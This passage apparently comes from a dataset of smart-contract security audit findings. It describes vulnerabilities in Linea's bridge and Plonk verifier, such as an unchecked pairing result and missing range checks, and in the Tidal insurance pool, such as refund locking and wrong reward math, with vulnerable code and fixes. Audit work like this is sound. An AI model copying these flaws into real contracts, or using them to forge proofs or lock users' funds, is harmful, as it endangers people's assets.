{\\n inboxL1L2MessageStatus[messageHash] = INBOX\\_STATUS\\_RECEIVED;\\n }\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessageHashesAddedToInbox(\\_messageHashes);\\n```\\n\\nIt may trigger false alarms, as they will still be a part of `L1L2MessagesReceivedOnL2` and `L1L2MessageHashesAddedToInbox`.\\n`_updateL1L2MessageStatusToReceived` checks the status of L1->L2 messages as:\\n```\\nif 
(existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n}\\n```\\n\\nHowever, the status is need to be checked with `OUTBOX_STATUS_UNKNOWN` instead of `INBOX_STATUS_UNKNOWN` as it is an outbox message. This creates a hindrance in the code readability and should be fixed.\\nArray `timestampHashes` stores `l2BlockTimestamp` as integers, contrary to the hashes that the variable name states.\\n```\\ntimestampHashes[i] = blockInfo.l2BlockTimestamp;\\n```\\n\\nUnused error declaration\\n```\\n \\* dev Thrown when the decoding action is invalid.\\n \\*/\\n\\nerror InvalidAction();\\n```\\n\\nTransactionDecoder defines an error as `InvalidAction` which is supposed to be thrown when the decoding action is invalid, as stated in NATSPEC comment. However, it is currently unutilized.чOnly update the status for sent messages in `_updateL1L2MessageStatusToReceived`, and unknown messages in `addL1L2MessageHashes` and revert otherwise, to avoid off-chain accounting errors.\\nCheck the status of L1->L2 sent message with `OUTBOX_STATUS_UNKNOWN` to increase code readability.\\nEither store timestamp hashes in the variable `timestampHashes` or update the variable name likewise.\\nRemove the error declaration if it is not serving any purpose.чч```\\nfunction \\_updateL1L2MessageStatusToReceived(bytes32[] memory \\_messageHashes) internal {\\n uint256 messageHashArrayLength = \\_messageHashes.length;\\n\\n for (uint256 i; i < messageHashArrayLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n uint256 existingStatus = outboxL1L2MessageStatus[messageHash];\\n\\n if (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n }\\n\\n if (existingStatus != OUTBOX\\_STATUS\\_RECEIVED) {\\n outboxL1L2MessageStatus[messageHash] = OUTBOX\\_STATUS\\_RECEIVED;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessagesReceivedOnL2(\\_messageHashes);\\n}\\n```\\n -TransactionDecoder Does Not Account for the Missing 
Elements While Decoding a TransactionчlowчThe library tries to decode calldata from different transaction types, by jumping to the position of calldata element in the rlp encoding. These positions are:\\nEIP1559: 8\\nEIP2930: 7\\nLegacy: 6\\n```\\ndata = it.\\_skipTo(8).\\_toBytes();\\n```\\n\\n```\\ndata = it.\\_skipTo(7).\\_toBytes();\\n```\\n\\n```\\ndata = it.\\_skipTo(6).\\_toBytes();\\n```\\n\\nHowever, the decoder doesn't check whether the required element is there or not in the encoding provided.\\nThe decoder uses the library RLPReader to skip to the desired element in encoding. However, it doesn't revert in case there are not enough elements to skip to, and will simply return byte `0x00`, while still completing unnecessary iterations.\\n```\\nfunction \\_skipTo(Iterator memory \\_self, uint256 \\_skipToNum) internal pure returns (RLPItem memory item) {\\n uint256 ptr = \\_self.nextPtr;\\n uint256 itemLength = \\_itemLength(ptr);\\n \\_self.nextPtr = ptr + itemLength;\\n\\n for (uint256 i; i < \\_skipToNum - 1; ) {\\n ptr = \\_self.nextPtr;\\n itemLength = \\_itemLength(ptr);\\n \\_self.nextPtr = ptr + itemLength;\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n item.len = itemLength;\\n item.memPtr = ptr;\\n}\\n```\\n\\nAlthough it doesn't impose any security issue, as `ZkEvmV2` tries to decode an array of bytes32 hashes from the rlp encoded transaction. 
However, it may still lead to errors in other use cases if not handled correctly.\n```\nCodecV2.\_extractXDomainAddHashes(TransactionDecoder.decodeTransaction(\_transactions[\_batchReceptionIndices[i]]))\n```\nчThe RLP library should revert if there are not enough elements to skip to in the encoding.чч```\ndata = it.\_skipTo(8).\_toBytes();\n```\n -Incomplete Message State Check When Claiming Messages on L1 and L2чlowчWhen claiming a message on L1 or L2, `_updateL2L1MessageStatusToClaimed` and `_updateL1L2MessageStatusToClaimed` are called to update the message status; however, the message state check only checks status `INBOX_STATUS_RECEIVED` and is missing status `INBOX_STATUS_UNKNOWN`, which means the message has not been picked up by the coordinator or has not been sent on L1 or L2 and should be reverted. As a result, the claiming message could be reverted with an incorrect reason.\n```\nfunction \_updateL2L1MessageStatusToClaimed(bytes32 \_messageHash) internal {\n if (inboxL2L1MessageStatus[\_messageHash] != INBOX\_STATUS\_RECEIVED) {\n revert MessageAlreadyClaimed();\n }\n\n delete inboxL2L1MessageStatus[\_messageHash];\n\n emit L2L1MessageClaimed(\_messageHash);\n}\n```\n\n```\n function \_updateL1L2MessageStatusToClaimed(bytes32 \_messageHash) internal {\n if (inboxL1L2MessageStatus[\_messageHash] != INBOX\_STATUS\_RECEIVED) {\n revert MessageAlreadyClaimed();\n }\n\n inboxL1L2MessageStatus[\_messageHash] = INBOX\_STATUS\_CLAIMED;\n\n emit L1L2MessageClaimed(\_messageHash);\n }\n}\n```\nчAdd the missing status check and relevant revert reason for status `INBOX_STATUS_UNKNOWN`чч```\nfunction \_updateL2L1MessageStatusToClaimed(bytes32 \_messageHash) internal {\n if (inboxL2L1MessageStatus[\_messageHash] != INBOX\_STATUS\_RECEIVED) {\n revert MessageAlreadyClaimed();\n }\n\n delete inboxL2L1MessageStatus[\_messageHash];\n\n emit L2L1MessageClaimed(\_messageHash);\n}\n```\n -Events Which May Trigger 
False Alarmsчlowч1- `PauseManager` allows `PAUSE_MANAGER_ROLE` to pause/unpause a type as:\\n```\\nfunction pauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = true;\\n emit Paused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n\\n```\\nfunction unPauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = false;\\n emit UnPaused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n\\nHowever, the functions don't check whether the given `_pauseType` has already been paused/unpaused or not and emits an event every time called. This may trigger false alarms for off-chain monitoring tools and may cause unnecessary panic.\\n2 - `RateLimitter` allows resetting the limit and used amount as:\\n```\\nfunction resetRateLimitAmount(uint256 \\_amount) external onlyRole(RATE\\_LIMIT\\_SETTER\\_ROLE) {\\n bool amountUsedLoweredToLimit;\\n\\n if (\\_amount < currentPeriodAmountInWei) {\\n currentPeriodAmountInWei = \\_amount;\\n amountUsedLoweredToLimit = true;\\n }\\n\\n limitInWei = \\_amount;\\n\\n emit LimitAmountChange(\\_msgSender(), \\_amount, amountUsedLoweredToLimit);\\n}\\n```\\n\\n```\\nfunction resetAmountUsedInPeriod() external onlyRole(RATE\\_LIMIT\\_SETTER\\_ROLE) {\\n currentPeriodAmountInWei = 0;\\n\\n emit AmountUsedInPeriodReset(\\_msgSender());\\n}\\n```\\n\\nHowever, it doesn't account for the scenarios where the function can be called after the current period ends and before a new period gets started. 
As the `currentPeriodAmountInWei` will still be holding the used amount of the last period, if the `RATE_LIMIT_SETTER_ROLE` tries to reset the limit with the lower value than the used amount, the function will emit the same event `LimitAmountChange` with the flag `amountUsedLoweredToLimit`.\\nAdding to it, the function will make `currentPeriodAmountInWei` = `limitInWei`, which means no more amount can be added as the used amount until the used amount is manually reset to 0, which points out to the fact that the used amount should be automatically reset, once the current period ends. Although it is handled automatically in function `_addUsedAmount`, however, if the new period has not yet started, it is supposed to be done in a 2-step approach i.e., first, reset the used amount and then the limit. It can be simplified by checking for the current period in the `resetRateLimitAmount` function itself.\\nThe same goes for the scenario where the used amount is reset after the current period ends. 
It will emit the same event as `AmountUsedInPeriodReset`\\nThese can create unnecessary confusion, as the events emitted don't consider the abovementioned scenarios.чConsider adding checks to make sure already paused/unpaused types don't emit respective events.\\nConsider emitting different events, or adding a flag in the events, that makes it easy to differentiate whether the limit and used amount are reset in the current period or after it has ended.\\nReset `currentPeriodAmountInWei` in function `resetRateLimitAmount` itself if the current period has ended.чч```\\nfunction pauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = true;\\n emit Paused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n -No Proper Trusted Setup AcknowledgedчhighчLinea uses Plonk proof system, which needs a preprocessed CRS (Common Reference String) for proving and verification, the Plonk system security is based on the existence of a trusted setup ceremony to compute the CRS, the current verifier uses a CRS created by one single party, which requires fully trust of the party to delete the toxic waste (trapdoor) which can be used to generate forged proof, undermining the security of the entire system\\n```\\nuint256 constant g2\\_srs\\_0\\_x\\_0 = 11559732032986387107991004021392285783925812861821192530917403151452391805634;\\nuint256 constant g2\\_srs\\_0\\_x\\_1 = 10857046999023057135944570762232829481370756359578518086990519993285655852781;\\nuint256 constant g2\\_srs\\_0\\_y\\_0 = 4082367875863433681332203403145435568316851327593401208105741076214120093531;\\nuint256 constant g2\\_srs\\_0\\_y\\_1 = 8495653923123431417604973247489272438418190587263600148770280649306958101930;\\n\\nuint256 constant g2\\_srs\\_1\\_x\\_0 = 18469474764091300207969441002824674761417641526767908873143851616926597782709;\\nuint256 constant g2\\_srs\\_1\\_x\\_1 = 17691709543839494245591259280773972507311536864513996659348773884770927133474;\\nuint256 
constant g2\\_srs\\_1\\_y\\_0 = 2799122126101651639961126614695310298819570600001757598712033559848160757380;\\nuint256 constant g2\\_srs\\_1\\_y\\_1 = 3054480525781015242495808388429905877188466478626784485318957932446534030175;\\n```\\nчConduct a proper MPC to generate CRS like the Powers of Tau MPC or use a trustworthy CRS generated by an exisiting audited trusted setup like Aztec's ignitionчч```\\nuint256 constant g2\\_srs\\_0\\_x\\_0 = 11559732032986387107991004021392285783925812861821192530917403151452391805634;\\nuint256 constant g2\\_srs\\_0\\_x\\_1 = 10857046999023057135944570762232829481370756359578518086990519993285655852781;\\nuint256 constant g2\\_srs\\_0\\_y\\_0 = 4082367875863433681332203403145435568316851327593401208105741076214120093531;\\nuint256 constant g2\\_srs\\_0\\_y\\_1 = 8495653923123431417604973247489272438418190587263600148770280649306958101930;\\n\\nuint256 constant g2\\_srs\\_1\\_x\\_0 = 18469474764091300207969441002824674761417641526767908873143851616926597782709;\\nuint256 constant g2\\_srs\\_1\\_x\\_1 = 17691709543839494245591259280773972507311536864513996659348773884770927133474;\\nuint256 constant g2\\_srs\\_1\\_y\\_0 = 2799122126101651639961126614695310298819570600001757598712033559848160757380;\\nuint256 constant g2\\_srs\\_1\\_y\\_1 = 3054480525781015242495808388429905877188466478626784485318957932446534030175;\\n```\\n -Missing Verifying Paring Check ResultчhighчIn function `batch_verify_multi_points`, the SNARK paring check is done by calling paring pre-compile `let l_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)` and the only the execution status is stored in the final success state (state_success), but the the paring check result which is stored in 0x00 is not stored and checked, which means if the paring check result is 0 (pairing check failed), the proof would still pass verification, e.g. invalid proof with incorrect proof element `proof_openings_selector_commit_api_at_zeta` would pass the paring check. 
As a result, it breaks the SNARK pairing verification.\n```\nlet l\_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)\n// l\_success := true\nmstore(add(state, state\_success), and(l\_success,mload(add(state, state\_success))))\n```\n\nAnother example is, if either of the following is sent as a point at infinity or (0,0) as (x,y) co-ordinate:\ncommitment to the opening proof polynomial Wz\ncommitment to the opening proof polynomial Wzw\nThe proof will still work, since the pairing result is not being checked.чVerify the pairing check result and store it in the final success state after calling the pairing pre-compileчч```\nlet l\_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)\n// l\_success := true\nmstore(add(state, state\_success), and(l\_success,mload(add(state, state\_success))))\n```\n -Gas Griefing and Missing Return Status Check for staticcall(s), May Lead to Unexpected Outcomes Partially AddressedчhighчThe gas supplied to the staticcall(s) is calculated by subtracting `2000` from the remaining gas at this point in time. However, if not provided enough gas, the staticcall(s) may fail and there will be no return data, and the execution will continue with the stale data that was previously there at the memory location specified by the return offset with the staticcall(s).\n1- Predictable Derivation of Challenges\nThe function `derive_gamma_beta_alpha_zeta` is used to derive the challenge values `gamma`, `beta`, `alpha`, `zeta`. These values are derived from the prover's transcript by hashing defined parameters and are supposed to be unpredictable by either the prover or the verifier. The hash is collected with the help of the SHA2-256 precompile. The values are considered unpredictable, due to the assumption that SHA2-256 acts as a random oracle and it would be computationally infeasible for an attacker to find the pre-image of `gamma`. 
However, the assumption might be wrong.\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), size, mPtr, 0x20)) //0x1b -> 000..\"gamma\"\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1c), 0x24, mPtr, 0x20)) //0x1b -> 000..\"gamma\"\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), 0x65, mPtr, 0x20)) //0x1b -> 000..\"gamma\"\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1c), 0xe4, mPtr, 0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr,start\\_input), size\\_input, add(state, state\\_gamma\\_kzg), 0x20))\\n```\\n\\nIf the staticcall(s) fails, it will make the challenge values to be predictable and may help the prover in forging proofs and launching other adversarial attacks.\\n2- Incorrect Exponentiation\\nFunctions `compute_ith_lagrange_at_z`, `compute_pi`, and `verify` compute modular exponentiation by making a `staticcall` to the precompile `modexp` as:\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,0x00,0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,mPtr,0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,mPtr,0x20))\\n```\\n\\nHowever, if not supplied enough gas, the staticcall(s) will fail, thus returning no result and the execution will continue with the stale data.\\n3. Incorrect Point Addition and Scalar Multiplication\\n```\\npop(staticcall(sub(gas(), 2000),7,folded\\_evals\\_commit,0x60,folded\\_evals\\_commit,0x40))\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),6,mPtr,0x80,dst,0x40)\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n```\\n\\n```\\nl\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n```\\n\\nFor the same reason, `point_add`, `point_mul`, and `point_acc_mul` will return incorrect results. 
Matter of fact, `point_acc_mul` will not revert even if the scalar multiplication fails in the first step. Because, the memory location specified for the return offset, will still be containing the old (x,y) coordinates of `src`, which are points on the curve. Hence, it will proceed by incorrectly adding (x,y) coordinates of `dst` with it.\\nHowever, it will not be practically possible to conduct a gas griefing attack for staticcall(s) at the start of the top-level transaction. As it will require an attacker to pass a very low amount of gas to make the `staticcall` fail, but at the same time, that would not be enough to make the top-level transaction execute entirely and not run out of gas. But, this can still be conducted for the staticcall(s) that are executed at the near end of the top-level transaction.чCheck the returned status of the staticcall and revert if any of the staticcall's return status has been 0.\\nAlso fix the comments mentioned for every staticcall, for instance: the function `derive_beta` says `0x1b -> 000..\"gamma\"` while the memory pointer holds the ASCII value of string `beta`чч```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), size, mPtr, 0x20)) //0x1b -> 000..\"gamma\"\\n```\\n -Missing Scalar Field Range Check in Scalar MultiplicationчhighчThere is no field element range check on scalar field proof elements e.g. `proof_l_at_zeta, proof_r_at_zeta, proof_o_at_zeta, proof_s1_at_zeta,proof_s2_at_zeta, proof_grand_product_at_zeta_omega` as mentioned in the step 2 of the verifier's algorithm in the Plonk paper. 
The scalar multiplication functions `point_mul` and `point_acc_mul` call the precompile ECMUL defined in EIP-196, which verifies that the point P is on the curve and that P.x and P.y are less than the base field modulus; however, it doesn't check that the scalar `s` is less than the scalar field modulus. If `s` is greater than the scalar field modulus `r_mod`, it would cause unintended behavior of the contract; specifically, if a scalar field proof element `e` is replaced by `e` + `r_mod`, the proof would still pass verification. In Plonk's case, however, only a few attack vectors could exist based on this kind of proof malleability.\n```\nfunction point\_mul(dst,src,s, mPtr) {\n // let mPtr := add(mload(0x40), state\_last\_mem)\n let state := mload(0x40)\n mstore(mPtr,mload(src))\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\n mstore(add(mPtr,0x40),s)\n let l\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\n mstore(add(state, state\_success), and(l\_success,mload(add(state, state\_success))))\n}\n\n// dst <- dst + [s]src (Elliptic curve)\nfunction point\_acc\_mul(dst,src,s, mPtr) {\n let state := mload(0x40)\n mstore(mPtr,mload(src))\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\n mstore(add(mPtr,0x40),s)\n let l\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\n mstore(add(mPtr,0x40),mload(dst))\n mstore(add(mPtr,0x60),mload(add(dst,0x20)))\n l\_success := and(l\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\n mstore(add(state, state\_success), and(l\_success,mload(add(state, state\_success))))\n}\n```\nчAdd scalar field range check on scalar multiplication functions `point_mul` and `point_acc_mul` or the scalar field proof elements.чч```\nfunction point\_mul(dst,src,s, mPtr) {\n // let mPtr := add(mload(0x40), state\_last\_mem)\n let state := mload(0x40)\n mstore(mPtr,mload(src))\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\n mstore(add(mPtr,0x40),s)\n let l\_success := 
staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n\\n// dst <- dst + [s]src (Elliptic curve)\\nfunction point\\_acc\\_mul(dst,src,s, mPtr) {\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n mstore(add(mPtr,0x40),mload(dst))\\n mstore(add(mPtr,0x60),mload(add(dst,0x20)))\\n l\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n```\\n -Missing Public Inputs Range CheckчhighчThe public input is an array of `uint256` numbers, there is no check if each public input is less than SNARK scalar field modulus `r_mod`, as mentioned in the step 3 of the verifier's algorithm in the Plonk paper. Since public inputs are involved computation of `Pi` in the plonk gate which is in the SNARK scalar field, without the check, it might cause scalar field overflow and the verification contract would fail and revert. 
To prevent overflow and other unintended behavior there should be a range check for the public inputs.\\n```\\nfunction Verify(bytes memory proof, uint256[] memory public\\_inputs)\\n```\\n\\n```\\nsum\\_pi\\_wo\\_api\\_commit(add(public\\_inputs,0x20), mload(public\\_inputs), zeta)\\npi := mload(mload(0x40))\\n\\nfunction sum\\_pi\\_wo\\_api\\_commit(ins, n, z) {\\n let li := mload(0x40)\\n batch\\_compute\\_lagranges\\_at\\_z(z, n, li)\\n let res := 0\\n let tmp := 0\\n for {let i:=0} lt(i,n) {i:=add(i,1)}\\n {\\n tmp := mulmod(mload(li), mload(ins), r\\_mod)\\n res := addmod(res, tmp, r\\_mod)\\n li := add(li, 0x20)\\n ins := add(ins, 0x20)\\n }\\n mstore(mload(0x40), res)\\n}\\n```\\nчAdd range check for the public inputs `require(input[i] < r_mod, \"public inputs greater than snark scalar field\");`чч```\\nfunction Verify(bytes memory proof, uint256[] memory public\\_inputs)\\n```\\n -Loading Arbitrary Data as Wire Commitments AcknowledgedчmediumчFunction `load_wire_commitments_commit_api` as the name suggests, loads wire commitments from the proof into the memory array `wire_commitments`. The array is made to hold 2 values per commitment or the size of the array is 2 * `vk_nb_commitments_commit_api`, which makes sense as these 2 values are the x & y co-ordinates of the commitments.\\n```\\nuint256[] memory wire\\_committed\\_commitments = new uint256[](2\\*vk\\_nb\\_commitments\\_commit\\_api);\\nload\\_wire\\_commitments\\_commit\\_api(wire\\_committed\\_commitments, proof);\\n```\\n\\nComing back to the functionload_wire_commitments_commit_api, it extracts both the x & y coordinates of a commitment in a single iteration. However, the loop runs `2 * vk_nb_commitments_commit_api`, or in other words, twice as many of the required iterations. For instance, if there is 1 commitment, it will run two times. The first iteration will pick up the actual coordinates and the second one can pick any arbitrary data from the proof(if passed) and load it into memory. 
Although, this data which has been loaded in an extra iteration seems harmless but still adds an overhead for the processing.\\n```\\nfor {let i:=0} lt(i, mul(vk\\_nb\\_commitments\\_commit\\_api,2)) {i:=add(i,1)}\\n```\\nчThe number of iterations should be equal to the size of commitments, i.e., `vk_nb_commitments_commit_api`. So consider switching from:\\n```\\nfor {let i:=0} lt(i, mul(vk_nb_commitments_commit_api,2)) {i:=add(i,1)}\\n```\\n\\nto:\\n```\\nfor {let i:=0} lt(i, vk_nb_commitments_commit_api) {i:=add(i,1)}\\n```\\nчч```\\nuint256[] memory wire\\_committed\\_commitments = new uint256[](2\\*vk\\_nb\\_commitments\\_commit\\_api);\\nload\\_wire\\_commitments\\_commit\\_api(wire\\_committed\\_commitments, proof);\\n```\\n -Makefile: Target OrderчlowчThe target `all` in the Makefile ostensibly wants to run the targets `clean` and `solc` in that order.\\n```\\nall: clean solc\\n```\\n\\nHowever prerequisites in GNU Make are not ordered, and they might even run in parallel. In this case, this could cause spurious behavior like overwrite errors or files being deleted just after being created.чThe Make way to ensure that targets run one after the other is\\n```\\nall: clean\\n $(MAKE) solc\\n```\\n\\nAlso `all` should be listed in the PHONY targets.чч```\\nall: clean solc\\n```\\n -addPremium - A back runner may cause an insurance holder to lose their refunds by calling addPremium right after the original callчhighч`addPremium` is a public function that can be called by anyone and that distributes the weekly premium payments to the pool manager and the rest of the pool share holders. If the collateral deposited is not enough to cover the total coverage offered to insurance holders for a given week, refunds are allocated pro rata for all insurance holders of that particular week and policy. 
However, in the current implementation, attackers can call `addPremium` right after the original call to `addPremium` but before the call to refund; this will cause the insurance holders to lose their refunds, which will be effectively locked forever in the contract (unless the contract is upgraded).\\n```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\nч`addPremium` should contain a validation check in the beginning of the function that reverts for the case of `incomeMap[policyIndex_][week] = 0`.чч```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n -refund - attacker can lock insurance holder's refunds by calling refund before a refund was allocatedчhighч`addPremium` is used to determine the `refund` amount that an insurance holder is eligible to claim. The amount is stored in the `refundMap` mapping and can then later be claimed by anyone on behalf of an insurance holder by calling `refund`. The `refund` function can't be called more than once for a given combination of `policyIndex_`, `week_`, and `who_`, as it would revert with an “Already refunded” error. 
This gives an attacker the opportunity to call `refund` on behalf of any insurance holder with value 0 inside the `refundMap`, causing any future `refund` allocated for that holder in a given week and for a given policy to be locked forever in the contract (unless the contract is upgraded).\\n```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, \"Already refunded\");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\nчThere should be a validation check at the beginning of the function that reverts if `refundMap[policyIndex_][week_] == 0`.чч```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, \"Already refunded\");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n -addTidal, 
_updateUserTidal, withdrawTidal - wrong arithmetic calculationsчhighчTo further incentivize sellers, anyone - although it will usually be the pool manager - can send an arbitrary amount of the Tidal token to a pool, which is then supposed to be distributed proportionally among the share owners. There are several flaws in the calculations that implement this mechanism:\\nA. addTidal:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n\\nThis should be:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS).div(poolInfo.totalShare));\\n```\\n\\nNote the different parenthesization. Without SafeMath:\\n```\\npoolInfo.accTidalPerShare += amount\\_ \\* SHARE\\_UNITS / poolInfo.totalShare;\\n```\\n\\nB. _updateUserTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nThis should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul`. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nC. withdrawTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(userInfo.share);\\n```\\n\\nAs in B, this should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul` and that a division by `SHARE_UNITS` has been appended. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nAs an additional minor point, the division in `addTidal` will revert with a panic (0x12) if the number of shares in the pool is zero. This case could be handled more gracefully.чImplement the fixes described above. 
The versions without `SafeMath` are easier to read and should be preferred; see https://github.com/ConsensysDiligence/tidal-audit-2023-04/issues/20.чч```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n -claim - Incomplete and lenient implementationчhighчIn the current version of the code, the `claim` function is lacking crucial input validation logic as well as required state changes. Most of the process is implemented in other contracts or off-chain at the moment and is therefore out of scope for this audit, but there might still be issues caused by potential errors in the process. Moreover, pool manager and committee together have unlimited ownership of the deposits and can essentially withdraw all collateral to any desired address.\\n```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\nчTo ensure a more secure claiming process, we propose adding the following logic to the `claim` function:\\n`refund` should be called at the beginning of the `claim` flow, so that the recipient's true coverage amount will be used.\\n`policyIndex` should be added as a parameter to this function, so that `coverageMap` can be used to validate that the amount claimed on behalf of a recipient is covered.\\nThe payout amount should be subtracted in the `coveredMap` and `coverageMap` mappings.чч```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n -buy - insurance buyers trying to increase their coverage amount will lose their previous coverageчhighчWhen a user is willing to `buy` insurance, he is required to specify the desired amount (denoted as amount_) and to pay the entire premium upfront. In return, he receives the ownership over an entry inside the `coverageMap` mapping. 
If a user calls the `buy` function more than once for the same policy and time frame, his entry in the `coverageMap` will not represent the accumulated amount that he paid for but only the last coverage amount, which means previous coverage will be lost forever (unless the contract is upgraded).\\n```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n \"Not enough to buy\");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\nчThe coverage entry that represents the user's coverage should not be overwritten but should hold the accumulated amount of coverage instead.чч```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n \"Not enough to buy\");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n -Several issues related to upgradeability of contractsчmediumчWe did not find a proxy contract or factory in the repository, but 